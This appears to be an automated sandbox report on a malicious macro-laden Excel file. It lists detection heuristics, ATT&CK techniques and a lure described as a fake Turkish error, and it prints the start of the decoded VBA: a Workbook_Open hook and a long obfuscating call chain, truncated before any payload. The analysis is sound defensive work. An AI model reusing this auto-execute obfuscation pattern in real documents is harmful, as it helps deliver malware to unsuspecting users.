Verdict: MALICIOUS
Risk Score: 228
## Malware Insights

MITRE ATT&CK:

- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is an Excel file containing VBA macros, with a Workbook_Open event that calls a function which ultimately executes a Shell command. The document body displays a fake error message in Turkish, prompting the user to enable macros, which is a common social engineering tactic. The presence of the Shell() call and the Workbook_Open auto-execution strongly suggests the macro is designed to download and execute a second-stage payload.
## Heuristics (6)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Xls.Malware.Valyria-10036513-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0 |
| VBA macros detected (4 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Workbook_Open macro | high | OLE_VBA_WBOPEN | Workbook_Open macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
## Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16618 bytes | b3fd247dff2bcf7eddc5e71a7c9c8ebac8c9b63c363cac712efac2d9b690727e |

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WoRkbooK_oPen(): Call htehi: End Sub
Private Function htehi()
Call MpMBv
End Function
Private Sub MpMBv()
Call rkuWI
End Sub
Static Function rkuWI() As Object
Call kAkHz
End Function
Static Sub kAkHz()
Call PwScM
End Sub
Static Sub PwScM()
Call urAxZ
End Sub
Static Function urAxZ() As Single
Call ZniSm
End Function
Private Function ZniSm() As Byte
Call EiPnz
End Function
Private Function EiPnz() As Byte
Call xzGYp
End Function
Static Sub xzGYp()
Call cuosC
End Sub
Static Function cuosC() As Currency
Call HpWNP
End Function
Static Sub HpWNP()
Call nlEic
End Sub
Static Function nlEic() As Double
Call gBuTT
End Function
Private Sub gBuTT()
Call Lxcog
End Sub
Private Function Lxcog() As Variant
Call qsKJt
End Function
Private Sub qsKJt()
Call VnseG
End Sub
Static Function VnseG() As Integer
Call AjayT
End Function
Static Sub AjayT()
Call tzQkK
End Sub
Static Function tzQkK()
Call YvyEX
End Function
Static Function YvyEX()
Call DqgZk
End Function
Private Function DqgZk() As Date
Call ilOux
End Function
Private Sub ilOux()
Call NhvPK
End Sub
Static Function NhvPK() As Boolean
Call GxmAA
End Function
Static Function GxmAA() As Boolean
Call ltUVN
End Function
Static Sub ltUVN()
Call QoCqa
End Sub
Static Function QoCqa() As Byte
Call vjkKn
End Function
Private Sub vjkKn()
Call oAave
End Sub
Private Function oAave() As Long
Call TvIQr
End Function
Static Sub TvIQr()
Call zrqlE
End Sub
Static Function zrqlE() As String
Call emYGR
End Function
Static Sub emYGR()
Call JhFbe
End Sub
Static Function JhFbe() As String
Call CywMV
End Function
Private Sub CywMV()
Call newHn
End Sub
Function newHn() As Currency
Call RhuOl
End Function
Function RhuOl() As Boolean
Call vlsVj
End Function
Function vlsVj() As Single
Call Yoqdh
End Function
Function Yoqdh() As Integer
Call Crokf
End Function
Function Crokf() As String
Call gvnse
End Function
Static Sub gvnse()
Call wdcjy
End Sub
Static Sub wdcjy()
Call agaqw
End Sub
Static Sub agaqw()
Call EjYyu
End Sub
Static Function EjYyu() As Single
Call hnWFs
End Function
Static Function hnWFs()
Call LqUNr
End Function
Static Function LqUNr() As String
Call ptTUp
End Function
Static Function ptTUp() As Double
Call FbILJ
End Function
Static Function FbILJ() As Byte
Call jfGSH
End Function
Static Function jfGSH() As Single
Call MiEaF
End Function
Sub MiEaF()
Call qlChD
End Sub
Sub qlChD()
Call UpApC
End Sub
Sub UpApC()
Call ysywA
End Sub
Sub ysywA()
Call cvxEy
End Sub
Sub cvxEy()
Call sdmvS
End Sub
Sub sdmvS()
Call VhkCQ
End Sub
Function VhkCQ() As Variant
Call zkiKP
End Function
Function zkiKP() As Long
Call dngRN
End Function
Function dngRN() As Currency
Call HreYL
End Function
Function HreYL() As Date
Call ludgJ
End Function
Function ludgJ() As Object
Call AcSXd
End Function
Function AcSXd() As Integer
Call efQec
End Function
Sub efQec()
Call IjOma
End Sub
Sub IjOma()
Call mmMtY
End Sub
Sub mmMtY()
Call QpKBW
End Sub
Sub QpKBW()
Call ttIIU
End Sub
Sub ttIIU()
Call Jbyzp
End Sub
Sub Jbyzp()
Call wMWbU
End Sub
Static Function wMWbU() As Double
Call sMgnp
End Function
Function sMgnp() As Object
Call nNqyJ
End Function
Static Sub nNqyJ()
Call jOAKe
End Sub
Sub jOAKe()
Call eOKWy
End Sub
Static Function eOKWy() As Integer
Call MuLSp
End Function
Static Function MuLSp() As Byte
Call Iv
... (truncated)